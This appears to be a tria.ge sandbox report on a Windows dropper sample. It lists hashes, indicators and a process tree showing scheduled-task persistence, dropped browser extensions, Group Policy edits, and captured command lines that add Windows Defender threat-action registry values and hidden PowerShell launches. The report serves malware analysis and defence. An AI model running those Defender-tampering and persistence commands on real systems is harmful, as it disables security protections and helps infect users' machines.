Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
168s -
max time network
300s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
01/05/2024, 23:51
Static task
static1
Behavioral task
behavioral1
Sample
bd9223a89261ed0145e6a33c455d6fa6a00f7ddbb754646612682e6c624d14d3.exe
Resource
win7-20240419-en
General
-
Target
bd9223a89261ed0145e6a33c455d6fa6a00f7ddbb754646612682e6c624d14d3.exe
-
Size
7.3MB
-
MD5
49c1c3d1621a7af828cde4e712a64f26
-
SHA1
ba16d384f3fbd954eaa8deab2808e2341fd7466e
-
SHA256
bd9223a89261ed0145e6a33c455d6fa6a00f7ddbb754646612682e6c624d14d3
-
SHA512
0a954fe59edfc36d62859f8ca9cd32d5043662f92aa2c4d136fee185ec3c3ce305d1f0c55dc1301eb1956fb6885dff973ba2b0074dad5ffaac9e95b712f4398f
-
SSDEEP
196608:91OBiBwIPypbHKxKJAkezCFo3+vy80LtkJL5e+2Xo:3OBiB/P4b/e6K/jaDwo
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 30 372 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\International\Geo\Nation reYdBcL.exe -
Executes dropped EXE 4 IoCs
pid Process 288 Install.exe 2856 Install.exe 4676 Install.exe 4656 reYdBcL.exe -
Loads dropped DLL 1 IoCs
pid Process 372 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json reYdBcL.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json reYdBcL.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini Install.exe -
Drops file in System32 directory 35 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData reYdBcL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content reYdBcL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA reYdBcL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_F71C9FE0DBB76538B4EB93E5DEE9B878 reYdBcL.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat reYdBcL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies reYdBcL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 reYdBcL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_5C77EC0FCAF0A83EAAF0F4351F61FA27 reYdBcL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft reYdBcL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 reYdBcL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA reYdBcL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_F71C9FE0DBB76538B4EB93E5DEE9B878 reYdBcL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat rundll32.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 reYdBcL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_91B924923180E8714F1EDBCBF8DDC70F reYdBcL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 reYdBcL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA reYdBcL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_91B924923180E8714F1EDBCBF8DDC70F reYdBcL.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache reYdBcL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 reYdBcL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE reYdBcL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 reYdBcL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_5C77EC0FCAF0A83EAAF0F4351F61FA27 reYdBcL.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol reYdBcL.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 reYdBcL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 reYdBcL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA reYdBcL.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files (x86)\tcAZjUgKvOkyC\qgGPqOX.xml reYdBcL.exe File created C:\Program Files (x86)\lExdmLMBU\GbeKMvF.xml reYdBcL.exe File created C:\Program Files (x86)\PqbaBdNutUHU2\meqJHJgAPdOut.dll reYdBcL.exe File created C:\Program Files (x86)\PqbaBdNutUHU2\ZDTRhEY.xml reYdBcL.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi reYdBcL.exe File created C:\Program Files (x86)\vTGqftCYFnqsQTavPzR\cNLDKAd.dll reYdBcL.exe File created C:\Program Files (x86)\tcAZjUgKvOkyC\icWyGaC.dll reYdBcL.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi reYdBcL.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak reYdBcL.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja reYdBcL.exe File created C:\Program Files (x86)\ruvdGviMRzUn\lwZogTd.dll reYdBcL.exe File created C:\Program Files (x86)\lExdmLMBU\eJJAdu.dll reYdBcL.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak reYdBcL.exe File created C:\Program Files (x86)\vTGqftCYFnqsQTavPzR\xlWwbma.xml reYdBcL.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\baOmDneVXoOuKLmJPZ.job schtasks.exe File created C:\Windows\Tasks\YoRBImjUnYbxcjeUQ.job schtasks.exe File created C:\Windows\Tasks\kRLTqYWysAZjVOw.job schtasks.exe File created C:\Windows\Tasks\qZvWQJXUOVWXUoxnV.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2788 schtasks.exe 3780 schtasks.exe 3796 schtasks.exe 4244 schtasks.exe 3496 schtasks.exe 3904 schtasks.exe 2340 schtasks.exe 1580 schtasks.exe 5008 schtasks.exe 4580 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{34d48da6-0000-0000-0000-d01200000000} Install.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{34d48da6-0000-0000-0000-d01200000000}\MaxCapacity = "14116" Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{34d48da6-0000-0000-0000-d01200000000} reYdBcL.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache reYdBcL.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix reYdBcL.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket reYdBcL.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe -
Suspicious behavior: EnumeratesProcesses 58 IoCs
pid Process 1848 powershell.exe 1848 powershell.exe 1848 powershell.exe 5116 powershell.exe 5116 powershell.exe 5116 powershell.exe 3832 powershell.exe 3832 powershell.exe 3832 powershell.exe 4340 powershell.exe 4340 powershell.exe 4340 powershell.exe 4724 powershell.exe 4724 powershell.exe 4724 powershell.exe 3780 powershell.EXE 3780 powershell.EXE 3780 powershell.EXE 5112 powershell.exe 5112 powershell.exe 5112 powershell.exe 4656 reYdBcL.exe 4656 reYdBcL.exe 4656 reYdBcL.exe 4656 reYdBcL.exe 4656 reYdBcL.exe 4656 reYdBcL.exe 4656 reYdBcL.exe 4656 reYdBcL.exe 4656 reYdBcL.exe 4656 reYdBcL.exe 4656 reYdBcL.exe 4656 reYdBcL.exe 4656 reYdBcL.exe 4656 reYdBcL.exe 4656 reYdBcL.exe 4656 reYdBcL.exe 4200 powershell.exe 4200 powershell.exe 4200 powershell.exe 4656 reYdBcL.exe 4656 reYdBcL.exe 4656 reYdBcL.exe 4656 reYdBcL.exe 4656 reYdBcL.exe 4656 reYdBcL.exe 4656 reYdBcL.exe 4656 reYdBcL.exe 4656 reYdBcL.exe 4656 reYdBcL.exe 4656 reYdBcL.exe 4656 reYdBcL.exe 4656 reYdBcL.exe 4656 reYdBcL.exe 4656 reYdBcL.exe 4656 reYdBcL.exe 4656 reYdBcL.exe 4656 reYdBcL.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1848 powershell.exe Token: SeDebugPrivilege 5116 powershell.exe Token: SeIncreaseQuotaPrivilege 3060 WMIC.exe Token: SeSecurityPrivilege 3060 WMIC.exe Token: SeTakeOwnershipPrivilege 3060 WMIC.exe Token: SeLoadDriverPrivilege 3060 WMIC.exe Token: SeSystemProfilePrivilege 3060 WMIC.exe Token: SeSystemtimePrivilege 3060 WMIC.exe Token: SeProfSingleProcessPrivilege 3060 WMIC.exe Token: SeIncBasePriorityPrivilege 3060 WMIC.exe Token: SeCreatePagefilePrivilege 3060 WMIC.exe Token: SeBackupPrivilege 3060 WMIC.exe Token: SeRestorePrivilege 3060 WMIC.exe Token: SeShutdownPrivilege 3060 WMIC.exe Token: SeDebugPrivilege 3060 WMIC.exe Token: SeSystemEnvironmentPrivilege 3060 WMIC.exe Token: SeRemoteShutdownPrivilege 3060 WMIC.exe Token: SeUndockPrivilege 3060 WMIC.exe Token: SeManageVolumePrivilege 3060 WMIC.exe Token: 33 3060 WMIC.exe Token: 34 3060 WMIC.exe Token: 35 3060 WMIC.exe Token: 36 3060 WMIC.exe Token: SeIncreaseQuotaPrivilege 3060 WMIC.exe Token: SeSecurityPrivilege 3060 WMIC.exe Token: SeTakeOwnershipPrivilege 3060 WMIC.exe Token: SeLoadDriverPrivilege 3060 WMIC.exe Token: SeSystemProfilePrivilege 3060 WMIC.exe Token: SeSystemtimePrivilege 3060 WMIC.exe Token: SeProfSingleProcessPrivilege 3060 WMIC.exe Token: SeIncBasePriorityPrivilege 3060 WMIC.exe Token: SeCreatePagefilePrivilege 3060 WMIC.exe Token: SeBackupPrivilege 3060 WMIC.exe Token: SeRestorePrivilege 3060 WMIC.exe Token: SeShutdownPrivilege 3060 WMIC.exe Token: SeDebugPrivilege 3060 WMIC.exe Token: SeSystemEnvironmentPrivilege 3060 WMIC.exe Token: SeRemoteShutdownPrivilege 3060 WMIC.exe Token: SeUndockPrivilege 3060 WMIC.exe Token: SeManageVolumePrivilege 3060 WMIC.exe Token: 33 3060 WMIC.exe Token: 34 3060 WMIC.exe Token: 35 3060 WMIC.exe Token: 36 3060 WMIC.exe Token: SeDebugPrivilege 3832 powershell.exe Token: SeDebugPrivilege 4340 powershell.exe Token: SeDebugPrivilege 4724 powershell.exe Token: SeDebugPrivilege 3780 powershell.EXE Token: SeDebugPrivilege 5112 powershell.exe Token: SeDebugPrivilege 4200 powershell.exe Token: SeAssignPrimaryTokenPrivilege 5008 WMIC.exe Token: SeIncreaseQuotaPrivilege 5008 WMIC.exe Token: SeSecurityPrivilege 5008 WMIC.exe Token: SeTakeOwnershipPrivilege 5008 WMIC.exe Token: SeLoadDriverPrivilege 5008 WMIC.exe Token: SeSystemtimePrivilege 5008 WMIC.exe Token: SeBackupPrivilege 5008 WMIC.exe Token: SeRestorePrivilege 5008 WMIC.exe Token: SeShutdownPrivilege 5008 WMIC.exe Token: SeSystemEnvironmentPrivilege 5008 WMIC.exe Token: SeUndockPrivilege 5008 WMIC.exe Token: SeManageVolumePrivilege 5008 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 5008 WMIC.exe Token: SeIncreaseQuotaPrivilege 5008 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5096 wrote to memory of 288 5096 bd9223a89261ed0145e6a33c455d6fa6a00f7ddbb754646612682e6c624d14d3.exe 72 PID 5096 wrote to memory of 288 5096 bd9223a89261ed0145e6a33c455d6fa6a00f7ddbb754646612682e6c624d14d3.exe 72 PID 5096 wrote to memory of 288 5096 bd9223a89261ed0145e6a33c455d6fa6a00f7ddbb754646612682e6c624d14d3.exe 72 PID 288 wrote to memory of 2856 288 Install.exe 73 PID 288 wrote to memory of 2856 288 Install.exe 73 PID 288 wrote to memory of 2856 288 Install.exe 73 PID 2856 wrote to memory of 304 2856 Install.exe 74 PID 2856 wrote to memory of 304 2856 Install.exe 74 PID 2856 wrote to memory of 304 2856 Install.exe 74 PID 304 wrote to memory of 4704 304 cmd.exe 76 PID 304 wrote to memory of 4704 304 cmd.exe 76 PID 304 wrote to memory of 4704 304 cmd.exe 76 PID 4704 wrote to memory of 4808 4704 forfiles.exe 77 PID 4704 wrote to memory of 4808 4704 forfiles.exe 77 PID 4704 wrote to memory of 4808 4704 forfiles.exe 77 PID 4808 wrote to memory of 2364 4808 cmd.exe 78 PID 4808 wrote to memory of 2364 4808 cmd.exe 78 PID 4808 wrote to memory of 2364 4808 cmd.exe 78 PID 304 wrote to memory of 516 304 cmd.exe 79 PID 304 wrote to memory of 516 304 cmd.exe 79 PID 304 wrote to memory of 516 304 cmd.exe 79 PID 516 wrote to memory of 1632 516 forfiles.exe 80 PID 516 wrote to memory of 1632 516 forfiles.exe 80 PID 516 wrote to memory of 1632 516 forfiles.exe 80 PID 1632 wrote to memory of 920 1632 cmd.exe 81 PID 1632 wrote to memory of 920 1632 cmd.exe 81 PID 1632 wrote to memory of 920 1632 cmd.exe 81 PID 304 wrote to memory of 1424 304 cmd.exe 82 PID 304 wrote to memory of 1424 304 cmd.exe 82 PID 304 wrote to memory of 1424 304 cmd.exe 82 PID 1424 wrote to memory of 3028 1424 forfiles.exe 83 PID 1424 wrote to memory of 3028 1424 forfiles.exe 83 PID 1424 wrote to memory of 3028 1424 forfiles.exe 83 PID 3028 wrote to memory of 1756 3028 cmd.exe 84 PID 3028 wrote to memory of 1756 3028 cmd.exe 84 PID 3028 wrote to memory of 1756 3028 cmd.exe 84 PID 304 wrote to memory of 4824 304 cmd.exe 85 PID 304 wrote to memory of 4824 304 cmd.exe 85 PID 304 wrote to memory of 4824 304 cmd.exe 85 PID 4824 wrote to memory of 1440 4824 forfiles.exe 86 PID 4824 wrote to memory of 1440 4824 forfiles.exe 86 PID 4824 wrote to memory of 1440 4824 forfiles.exe 86 PID 1440 wrote to memory of 2956 1440 cmd.exe 87 PID 1440 wrote to memory of 2956 1440 cmd.exe 87 PID 1440 wrote to memory of 2956 1440 cmd.exe 87 PID 304 wrote to memory of 4820 304 cmd.exe 88 PID 304 wrote to memory of 4820 304 cmd.exe 88 PID 304 wrote to memory of 4820 304 cmd.exe 88 PID 4820 wrote to memory of 2496 4820 forfiles.exe 89 PID 4820 wrote to memory of 2496 4820 forfiles.exe 89 PID 4820 wrote to memory of 2496 4820 forfiles.exe 89 PID 2496 wrote to memory of 1848 2496 cmd.exe 90 PID 2496 wrote to memory of 1848 2496 cmd.exe 90 PID 2496 wrote to memory of 1848 2496 cmd.exe 90 PID 1848 wrote to memory of 3652 1848 powershell.exe 91 PID 1848 wrote to memory of 3652 1848 powershell.exe 91 PID 1848 wrote to memory of 3652 1848 powershell.exe 91 PID 2856 wrote to memory of 756 2856 Install.exe 93 PID 2856 wrote to memory of 756 2856 Install.exe 93 PID 2856 wrote to memory of 756 2856 Install.exe 93 PID 756 wrote to memory of 2904 756 forfiles.exe 95 PID 756 wrote to memory of 2904 756 forfiles.exe 95 PID 756 wrote to memory of 2904 756 forfiles.exe 95 PID 2904 wrote to memory of 5116 2904 cmd.exe 96
Processes
-
C:\Users\Admin\AppData\Local\Temp\bd9223a89261ed0145e6a33c455d6fa6a00f7ddbb754646612682e6c624d14d3.exe"C:\Users\Admin\AppData\Local\Temp\bd9223a89261ed0145e6a33c455d6fa6a00f7ddbb754646612682e6c624d14d3.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:5096 -
C:\Users\Admin\AppData\Local\Temp\7zSD542.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:288 -
C:\Users\Admin\AppData\Local\Temp\7zSD997.tmp\Install.exe.\Install.exe /FddidfBPP "525403" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2856 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵
- Suspicious use of WriteProcessMemory
PID:304 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"5⤵
- Suspicious use of WriteProcessMemory
PID:4704 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵
- Suspicious use of WriteProcessMemory
PID:4808 -
